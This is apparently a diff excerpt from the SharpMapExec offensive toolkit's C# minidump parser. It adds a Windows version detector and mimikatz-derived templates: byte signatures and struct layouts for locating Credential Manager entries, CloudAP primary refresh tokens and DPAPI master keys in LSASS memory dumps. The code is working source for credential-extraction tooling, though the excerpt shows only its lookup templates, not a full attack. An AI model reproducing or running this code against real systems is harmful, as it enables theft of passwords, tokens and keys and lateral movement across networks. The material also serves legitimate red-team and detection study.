180	+	}
181	+	}
182	+
183	+	return msi;
184	+	}
185	+
186	+	public static string guess_os(uint MajorVersion, uint MinorVersion, PRODUCT_TYPE ProductType)
187	+	{
188	+	string OperatingSystem = "";
189	+
190	+	if (MajorVersion == 10 && MinorVersion == 0 &&
191	+	ProductType == PRODUCT_TYPE.VER_NT_WORKSTATION)
192	+	{
193	+	OperatingSystem = "Windows 10";
194	+	}
195	+	else if (MajorVersion == 10 && MinorVersion == 0 &&
196	+	ProductType != PRODUCT_TYPE.VER_NT_WORKSTATION)
197	+	{
198	+	OperatingSystem = "Windows Server 2016 Technical Preview";
199	+	}
200	+	else if (MajorVersion == 6 && MinorVersion == 3 &&
201	+	ProductType == PRODUCT_TYPE.VER_NT_WORKSTATION)
202	+	{
203	+	OperatingSystem = "Windows 8.1";
204	+	}
205	+	else if (MajorVersion == 6 && MinorVersion == 3 &&
206	+	ProductType != PRODUCT_TYPE.VER_NT_WORKSTATION)
207	+	{
208	+	OperatingSystem = "Windows Server 2012 R2";
209	+	}
210	+	else if (MajorVersion == 6 && MinorVersion == 2 &&
211	+	ProductType == PRODUCT_TYPE.VER_NT_WORKSTATION)
212	+	{
213	+	OperatingSystem = "Windows 8";
214	+	}
215	+	else if (MajorVersion == 6 && MinorVersion == 2 &&
216	+	ProductType != PRODUCT_TYPE.VER_NT_WORKSTATION)
217	+	{
218	+	OperatingSystem = "Windows Server 2012";
219	+	}
220	+	else if (MajorVersion == 6 && MinorVersion == 1 &&
221	+	ProductType == PRODUCT_TYPE.VER_NT_WORKSTATION)
222	+	{
223	+	OperatingSystem = "Windows 7";
224	+	}
225	+	else if (MajorVersion == 6 && MinorVersion == 1 &&
226	+	ProductType != PRODUCT_TYPE.VER_NT_WORKSTATION)
227	+	{
228	+	OperatingSystem = "Windows Server 2008 R2";
229	+	}
230	+	else if (MajorVersion == 6 && MinorVersion == 0 &&
231	+	ProductType == PRODUCT_TYPE.VER_NT_WORKSTATION)
232	+	{
233	+	OperatingSystem = "Windows Vista";
234	+	}
235	+	else if (MajorVersion == 6 && MinorVersion == 0 &&
236	+	ProductType != PRODUCT_TYPE.VER_NT_WORKSTATION)
237	+	{
238	+	OperatingSystem = "Windows Server 2008";
239	+	}
240	+	else if (MajorVersion == 5 && MinorVersion == 1)
241	+	{
242	+	// Can't accurately report on Windows Server 2003/R2
243	+	// elif (MajorVersion == 5 and MinorVersion == 2 and ProductType == self.ProductType.VER_NT_WORKSTATION)
244	+	// self.OperatingSystem = "Windows Vista"
245	+	//elif (MajorVersion == 5 and MinorVersion == 2 and ProductType != self.ProductType.VER_NT_WORKSTATION)
246	+	// self.OperatingSystem = "Windows Server 2008"
247	+	OperatingSystem = "Windows XP";
248	+	}
249	+	else if (MajorVersion == 5 && MinorVersion == 0)
250	+	{
251	+	OperatingSystem = "Windows 2000";
252	+	}
253	+
254	+	return OperatingSystem;
255	+	}
256	+
257	+	public static MINIDUMP_SYSTEM_INFO parse(Directory.MINIDUMP_DIRECTORY dir, Program.MiniDump minidump)
258	+	{
259	+	minidump.fileBinaryReader.BaseStream.Seek(dir.Offset, 0);
260	+	byte[] chunk = minidump.fileBinaryReader.ReadBytes((int)dir.Size);
261	+
262	+	using (BinaryReader ChunkReader = new BinaryReader(new MemoryStream(chunk)))
263	+	{
264	+	MINIDUMP_SYSTEM_INFO si = Parse(ChunkReader);
265	+	si.OS = guess_os(si.MajorVersion, si.MinorVersion, si.ProductType);
266	+	return si;
267	+	}
268	+	}
269	+	}
270	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Templates/cloudap_templates.cs

1	+	using Minidump.Streams;
2	+	using System;
3	+	using System.Runtime.InteropServices;
4	+	using static Minidump.Helpers;
5	+
6	+	namespace Minidump.Templates
7	+	{
8	+	public class cloudap
9	+	{
10	+	public struct CloudapTemplate
11	+	{
12	+	public byte[] signature;
13	+	public int first_entry_offset;
14	+	public int luidOffset;
15	+	public int cacheOffset;
16	+	public int cbPRTOffset;
17	+	public int PRTOffset;
18	+	public int tonameOffset;
19	+	public Type list_entry;
20	+	}
21	+
22	+	public static CloudapTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
23	+	{
24	+	CloudapTemplate template = new CloudapTemplate();
25	+	if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsBuild.WIN_10_1903)
26	+	{
27	+	return template;
28	+	}
29	+	if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
30	+	{
31	+	template.signature = new byte[] { 0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75 };
32	+	template.first_entry_offset = -9;
33	+	template.list_entry = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
34	+	}
35	+	else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
36	+	{
37	+	template.signature = new byte[] { 0x8b, 0x31, 0x39, 0x72, 0x10, 0x75 };
38	+	template.first_entry_offset = -8;
39	+	template.list_entry = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
40	+	}
41	+	else
42	+	{
43	+	throw new Exception(String.Format("Could not identify template! Architecture: %s sysinfo.BuildNumber: %s", sysinfo.ProcessorArchitecture, sysinfo.BuildNumber));
44	+	}
45	+
46	+	template.luidOffset = StructFieldOffset(template.list_entry, "LocallyUniqueIdentifier");
47	+	template.cacheOffset = StructFieldOffset(template.list_entry, "cacheEntry");
48	+
49	+	template.cbPRTOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "cbPRT");
50	+	template.PRTOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "PRT");
51	+	template.tonameOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "toname");
52	+
53	+	return template;
54	+	}
55	+	}
56	+
57	+	public struct KIWI_CLOUDAP_CACHE_UNK
58	+	{
59	+	public uint unk0;
60	+	public uint unk1;
61	+	public uint unk2;
62	+	public uint unkSizeer;
63	+
64	+	public Guid guid;
65	+
66	+	[MarshalAs(UnmanagedType.ByValArray, SizeConst = 64)]
67	+	public byte[] unk;
68	+	}
69	+
70	+	public struct KIWI_CLOUDAP_CACHE_LIST_ENTRY
71	+	{
72	+	public long Flink;
73	+	public long Blink;
74	+	public uint unk0;
75	+	public IntPtr LockList;
76	+	public IntPtr unk1;
77	+	public IntPtr unk2;
78	+	public IntPtr unk3;
79	+	public IntPtr unk4;
80	+	public IntPtr unk5;
81	+	public uint unk6;
82	+	public uint unk7;
83	+	public uint unk8;
84	+	public uint unk9;
85	+	public IntPtr unkLogin0;
86	+	public IntPtr unkLogin1;
87	+
88	+	[MarshalAs(UnmanagedType.ByValArray, SizeConst = 130)]
89	+	public byte[] toname;
90	+
91	+	public long Sid;
92	+
93	+	public uint unk10;
94	+	public uint unk11;
95	+	public uint unk12;
96	+	public uint unk13;
97	+
98	+	//public KIWI_CLOUDAP_CACHE_UNK toDetermine;
99	+	public ulong toDetermine;
100	+
101	+	public IntPtr unk14;
102	+	public uint cbPRT;
103	+	public ulong PRT;
104	+	}
105	+
106	+	public struct KIWI_CLOUDAP_LOGON_LIST_ENTRY
107	+	{
108	+	public long Flink;
109	+	public long Blink;
110	+	public int unk0;
111	+	public int unk1;
112	+	public LUID LocallyUniqueIdentifier;
113	+	public Int64 unk2;
114	+	public Int64 unk3;
115	+	public long cacheEntry;
116	+	}
117	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Templates/credman_templates.cs

1	+	using Minidump.Streams;
2	+	using System;
3	+	using System.Runtime.InteropServices;
4	+	using static Minidump.Helpers;
5	+
6	+	namespace Minidump.Templates
7	+	{
8	+	public class credman
9	+	{
10	+	public struct CredmanTemplate
11	+	{
12	+	public byte[] signature;
13	+	public int offset;
14	+	public Type list_entry;
15	+	}
16	+
17	+	public static CredmanTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
18	+	{
19	+	CredmanTemplate template = new CredmanTemplate();
20	+	if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
21	+	{
22	+	if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
23	+	{
24	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_5);
25	+	template.offset = 0;
26	+	}
27	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
28	+	{
29	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_60);
30	+	template.offset = 0;
31	+	}
32	+	else
33	+	{
34	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY);
35	+	template.offset = 0;
36	+	}
37	+	}
38	+	else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
39	+	{
40	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_5_X86);
41	+	template.offset = -32;
42	+	}
43	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
44	+	{
45	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_60_X86);
46	+	template.offset = -32;
47	+	}
48	+	else
49	+	{
50	+	template.list_entry = typeof(KIWI_CREDMAN_LIST_ENTRY_X86);
51	+	template.offset = -32;
52	+	}
53	+	return template;
54	+	}
55	+	}
56	+
57	+	//x64
58	+	[StructLayout(LayoutKind.Sequential)]
59	+	public struct KIWI_CREDMAN_LIST_ENTRY
60	+	{
61	+	public uint cbEncPassword;
62	+	public long encPassword;
63	+	public uint unk0;
64	+	public uint unk1;
65	+	public IntPtr unk2;
66	+	public IntPtr unk3;
67	+	public IntPtr UserName;
68	+	public uint cbUserName;
69	+	public long Flink;
70	+	public long Blink;
71	+	public LIST_ENTRY unk4;
72	+	public UNICODE_STRING type;
73	+	public IntPtr unk5;
74	+	public UNICODE_STRING server1;
75	+	public IntPtr unk6;
76	+	public IntPtr unk7;
77	+	public IntPtr unk8;
78	+	public IntPtr unk9;
79	+	public IntPtr unk10;
80	+	public UNICODE_STRING user;
81	+	public uint unk11;
82	+	public UNICODE_STRING server2;
83	+	}
84	+
85	+	[StructLayout(LayoutKind.Sequential)]
86	+	public struct KIWI_CREDMAN_LIST_ENTRY_5
87	+	{
88	+	public uint cbEncPassword;
89	+	public long encPassword;
90	+	public uint unk0;
91	+	public uint unk1;
92	+	public IntPtr unk2;
93	+	public IntPtr unk3;
94	+	public IntPtr UserName;
95	+	public uint cbUserName;
96	+	public long Flink;
97	+	public long Blink;
98	+	public UNICODE_STRING server1;
99	+	public IntPtr unk6;
100	+	public IntPtr unk7;
101	+	public UNICODE_STRING user;
102	+	public IntPtr unk8;
103	+	public UNICODE_STRING server2;
104	+	}
105	+
106	+	[StructLayout(LayoutKind.Sequential)]
107	+	public struct KIWI_CREDMAN_LIST_ENTRY_60
108	+	{
109	+	public uint cbEncPassword;
110	+	public long encPassword;
111	+	public uint unk0;
112	+	public uint unk1;
113	+	public IntPtr unk2;
114	+	public IntPtr unk3;
115	+	public IntPtr UserName;
116	+	public uint cbUserName;
117	+	public long Flink;
118	+	public long Blink;
119	+	public UNICODE_STRING type;
120	+	public IntPtr unk5;
121	+	public UNICODE_STRING server1;
122	+	public IntPtr unk6;
123	+	public IntPtr unk7;
124	+	public IntPtr unk8;
125	+	public IntPtr unk9;
126	+	public IntPtr unk10;
127	+	public UNICODE_STRING user;
128	+	public IntPtr unk11;
129	+	public UNICODE_STRING server2;
130	+	}
131	+
132	+	//x86
133	+	[StructLayout(LayoutKind.Sequential)]
134	+	public struct KIWI_CREDMAN_LIST_ENTRY_X86
135	+	{
136	+	public uint cbEncPassword;
137	+	public long encPassword;
138	+	public uint unk0;
139	+	public uint unk1;
140	+	public IntPtr unk2;
141	+	public IntPtr unk3;
142	+	public IntPtr UserName;
143	+	public uint cbUserName;
144	+	public long Flink;
145	+	public long Blink;
146	+	public LIST_ENTRY unk4;
147	+	public UNICODE_STRING type;
148	+	public IntPtr unk5;
149	+	public UNICODE_STRING server1;
150	+	public IntPtr unk6;
151	+	public IntPtr unk7;
152	+	public IntPtr unk8;
153	+	public IntPtr unk9;
154	+	public IntPtr unk10;
155	+	public UNICODE_STRING user;
156	+	public uint unk11;
157	+	public UNICODE_STRING server2;
158	+	}
159	+
160	+	[StructLayout(LayoutKind.Sequential)]
161	+	public struct KIWI_CREDMAN_LIST_ENTRY_5_X86
162	+	{
163	+	public uint cbEncPassword;
164	+	public long encPassword;
165	+	public uint unk0;
166	+	public uint unk1;
167	+	public IntPtr unk2;
168	+	public IntPtr unk3;
169	+	public IntPtr UserName;
170	+	public uint cbUserName;
171	+	public long Flink;
172	+	public long Blink;
173	+	public UNICODE_STRING server1;
174	+	public IntPtr unk6;
175	+	public IntPtr unk7;
176	+	public UNICODE_STRING user;
177	+	public IntPtr unk8;
178	+	public UNICODE_STRING server2;
179	+	}
180	+
181	+	[StructLayout(LayoutKind.Sequential)]
182	+	public struct KIWI_CREDMAN_LIST_ENTRY_60_X86
183	+	{
184	+	public uint cbEncPassword;
185	+	public long encPassword;
186	+	public uint unk0;
187	+	public uint unk1;
188	+	public IntPtr unk2;
189	+	public IntPtr unk3;
190	+	public IntPtr UserName;
191	+	public uint cbUserName;
192	+	public long Flink;
193	+	public long Blink;
194	+	public UNICODE_STRING type;
195	+	public IntPtr unk5;
196	+	public UNICODE_STRING server1;
197	+	public IntPtr unk6;
198	+	public IntPtr unk7;
199	+	public IntPtr unk8;
200	+	public IntPtr unk9;
201	+	public IntPtr unk10;
202	+	public UNICODE_STRING user;
203	+	public IntPtr unk11;
204	+	public UNICODE_STRING server2;
205	+	}
206	+
207	+	[StructLayout(LayoutKind.Sequential)]
208	+	public struct KIWI_CREDMAN_SET_LIST_ENTRY
209	+	{
210	+	public IntPtr Flink;
211	+	public IntPtr Blink;
212	+	public uint unk0;
213	+	public IntPtr list1;
214	+	public IntPtr list2;
215	+	}
216	+
217	+	[StructLayout(LayoutKind.Sequential)]
218	+	public struct KIWI_CREDMAN_LIST_STARTER
219	+	{
220	+	private readonly uint unk0;
221	+	public IntPtr start;
222	+	}
223	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/MiniDump/Templates/dpapi_templates.cs

1	+	using Minidump.Streams;
2	+	using System;
3	+	using System.Runtime.InteropServices;
4	+	using static Minidump.Helpers;
5	+
6	+	namespace Minidump.Templates
7	+	{
8	+	public class dpapi
9	+	{
10	+	private const Int32 ANYSIZE_ARRAY = 1;
11	+
12	+	public struct DpapiTemplate
13	+	{
14	+	public byte[] signature;
15	+	public int first_entry_offset;
16	+	public object list_entry;
17	+	}
18	+
19	+	public static DpapiTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
20	+	{
21	+	DpapiTemplate template = new DpapiTemplate();
22	+	template.list_entry = new KIWI_MASTERKEY_CACHE_ENTRY();
23	+	if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
24	+	{
25	+	if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
26	+	{
27	+	template.signature = new byte[] { 0x4d, 0x3b, 0xee, 0x49, 0x8b, 0xfd, 0x0f, 0x85 };
28	+	template.first_entry_offset = -4;
29	+	}
30	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber &&
31	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
32	+	{
33	+	template.signature = new byte[] { 0x49, 0x3b, 0xef, 0x48, 0x8b, 0xfd, 0x0f, 0x84 };
34	+	template.first_entry_offset = -4;
35	+	}
36	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber &&
37	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
38	+	{
39	+	template.signature = new byte[] { 0x33, 0xc0, 0xeb, 0x20, 0x48, 0x8d, 0x05 };
40	+	template.first_entry_offset = 7;
41	+	}
42	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber &&
43	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
44	+	{
45	+	template.signature = new byte[]
46	+	{0x4c, 0x89, 0x1f, 0x48, 0x89, 0x47, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85};
47	+	template.first_entry_offset = -4;
48	+	}
49	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber &&
50	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
51	+	{
52	+	template.signature = new byte[] { 0x08, 0x48, 0x39, 0x48, 0x08, 0x0f, 0x85 };
53	+	template.first_entry_offset = -10;
54	+	}
55	+	else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber &&
56	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
57	+	{
58	+	template.signature = new byte[] { 0x48, 0x89, 0x4e, 0x08, 0x48, 0x39, 0x48, 0x08 };
59	+	template.first_entry_offset = -7;
60	+	}
61	+	else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1607)
62	+	{
63	+	template.signature = new byte[] { 0x48, 0x89, 0x4f, 0x08, 0x48, 0x89, 0x78, 0x08 };
64	+	template.first_entry_offset = 11;
65	+	}
66	+	else
67	+	{
68	+	//currently doesnt make sense, but keeping it here for future use
69	+	throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
70	+	}
71	+	}
72	+	else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
73	+	{
74	+	if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
75	+	{
76	+	template.signature = new byte[] { 0x33, 0xc0, 0x40, 0xa3 };
77	+	template.first_entry_offset = -4;
78	+	}
79	+	else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber &&
80	+	sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
81	+	{
82	+	template.signature = new byte[] { 0x8b, 0xf0, 0x81, 0xfe, 0xcc, 0x06, 0x00, 0x00, 0x0f, 0x84 };
83	+	template.first_entry_offset = -16;
84	+	}
85	+	else if (sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
86	+	{
87	+	template.signature = new byte[] { 0x33, 0xc0, 0x40, 0xa3 };
88	+	template.first_entry_offset = -4;
89	+	}
90	+	}
91	+	else
92	+	{
93	+	throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
94	+	}
95	+
96	+	return template;
97	+	}
98	+
99	+	[StructLayout(LayoutKind.Sequential)]
100	+	public struct KIWI_MASTERKEY_CACHE_ENTRY
101	+	{
102	+	public long Flink;
103	+	public long Blink;
104	+	public LUID LogonId;
105	+	public Guid KeyUid;
106	+	public FILETIME insertTime;
107	+	public uint keySize;
108	+
109	+	[MarshalAs(UnmanagedType.ByValArray, SizeConst = 64)]
110	+	public byte[] key;
111	+	}
112	+	}
113	+	}

Major improvements